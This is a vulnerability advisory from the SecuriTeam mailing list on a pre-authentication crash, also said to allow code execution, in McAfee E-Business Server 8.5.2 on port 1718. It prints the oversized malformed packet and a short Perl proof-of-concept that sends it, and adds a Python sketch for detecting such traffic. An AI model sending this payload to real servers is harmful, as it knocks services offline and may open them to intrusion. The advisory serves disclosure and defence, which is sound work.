McAfee E-Business Server Preauth Code DoS
------------------------------------------------------------------------
SUMMARY
McAfee E-Business Server "guards sensitive corporate data with
industry-standard PGP 128-bit encryption and authentication. McAfee
E-Business Server supports a variety of platforms and security
certificates". It is possible to crash McAfee's E-Business Server by sending
a malicious packet to its TCP port 1718.
DETAILS
Vulnerable Systems:
* McAfee E-Business Server version 8.5.2
It is possible to crash McAfee E-Business Server during the authentication
process. When a malformed (oversized) initial authentication packet is
sent to E-Business Server, the server will crash, and will have to be
manually restarted.
A malformed authentication packet is shown below:
"\x01\x3f\x2f\x05\x25\x2a" + "A" * 69953
McAfee further researched the vulnerability and confirmed that it allows
an attacker to also remotely execute code.
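Detection sketch (an added example, not part of the original advisory or of any vendor code): it sums the bytes a client sends in its opening message to TCP port 1718 across reassembled segments and reports flows that exceed a ceiling. The record layout, the function names and the 4096-byte ceiling are assumptions, since the advisory does not state a legitimate maximum size.

```python
from collections import defaultdict

EBS_PORT = 1718           # TCP port named in the advisory
MAX_PREAUTH_BYTES = 4096  # ASSUMPTION: locally chosen ceiling, tune to real traffic

def find_oversized_preauth(segments, limit=MAX_PREAUTH_BYTES, port=EBS_PORT):
    """Return {flow_id: bytes} for flows whose first client message exceeds limit.

    segments: (flow_id, server_port, direction, payload_len) tuples in capture
    order, direction "c2s" or "s2c" (hypothetical record layout).
    """
    first_msg = defaultdict(int)  # client bytes seen in the opening message
    closed = set()                # flows whose opening message has been answered
    for flow_id, server_port, direction, length in segments:
        if server_port != port or length == 0 or flow_id in closed:
            continue
        if direction == "c2s":
            first_msg[flow_id] += length
        elif first_msg[flow_id] > 0:
            # Server replied after the client spoke: opening message is over.
            closed.add(flow_id)
        # A server banner sent before any client data is ignored.
    return {f: n for f, n in first_msg.items() if n > limit}

def constructed_capture():
    """Constructed sample records, not real traffic."""
    # Flow A: small opening message, server reply, later bulk data (not counted).
    segs = [("A", 1718, "c2s", 120), ("A", 1718, "s2c", 64), ("A", 1718, "c2s", 5000)]
    # Flow B: 6-byte prefix + 69953 filler bytes from the advisory, 1460-byte segments.
    segs += [("B", 1718, "c2s", 1460)] * 47 + [("B", 1718, "c2s", 1339)]
    # Flow C: large upload to an unrelated port, ignored.
    segs += [("C", 443, "c2s", 90000)]
    # Flow D: server banner first, then a small opening message.
    segs += [("D", 1718, "s2c", 20), ("D", 1718, "c2s", 200), ("D", 1718, "s2c", 10)]
    return segs

if __name__ == "__main__":
    for flow, size in find_oversized_preauth(constructed_capture()).items():
        print(f"ALERT flow={flow} pre-auth bytes={size} limit={MAX_PREAUTH_BYTES}")
```

Counting per flow rather than per packet matters here because a message of this size is split over many TCP segments, so a single-packet size check would not see it.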
Solution:
The vendor has addressed this vulnerability with an E-Business Server patch
update on January 8th, 2008.
Vendor advisory and update link:
https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=614472&sliceId=SAL_Public&command=show&forward=nonthreadedKC&kcId=614472
Exploit:
#!/usr/bin/perl
#
#
# McAfee(R) E-Business Server(TM) 8.5.2 Remote preauth crash (PoC) -
# http://www.infigo.hr/files/mcafee2.pl
#
# - tested on Windows and Linux
#
#
# Leon Juranic <leon.juranic@infigo.hr>,
# Infigo IS <http://www.infigo.hr/en/>
#
use IO::Socket;
$saddr = "192.168.1.3";
$sport = 1718;
$exp1 = "\x01\x3f\x2f\x05\x25\x2a" . "A" x 69953;
print "> Sending exploit string...\n";
my $server_sock = IO::Socket::INET->new (PeerAddr => $saddr, PeerPort => $sport)
    || die ("Cannot connect to server!!!\n\n");
print $server_sock $exp1;
ADDITIONAL INFORMATION
The information has been provided by Leon Juranic <leon.juranic@infigo.hr>.
The original article can be found at:
http://www.infigo.hr/en/in_focus/advisories/INFIGO-2008-01-06
========================================
This bulletin is sent to members of the SecuriTeam mailing list.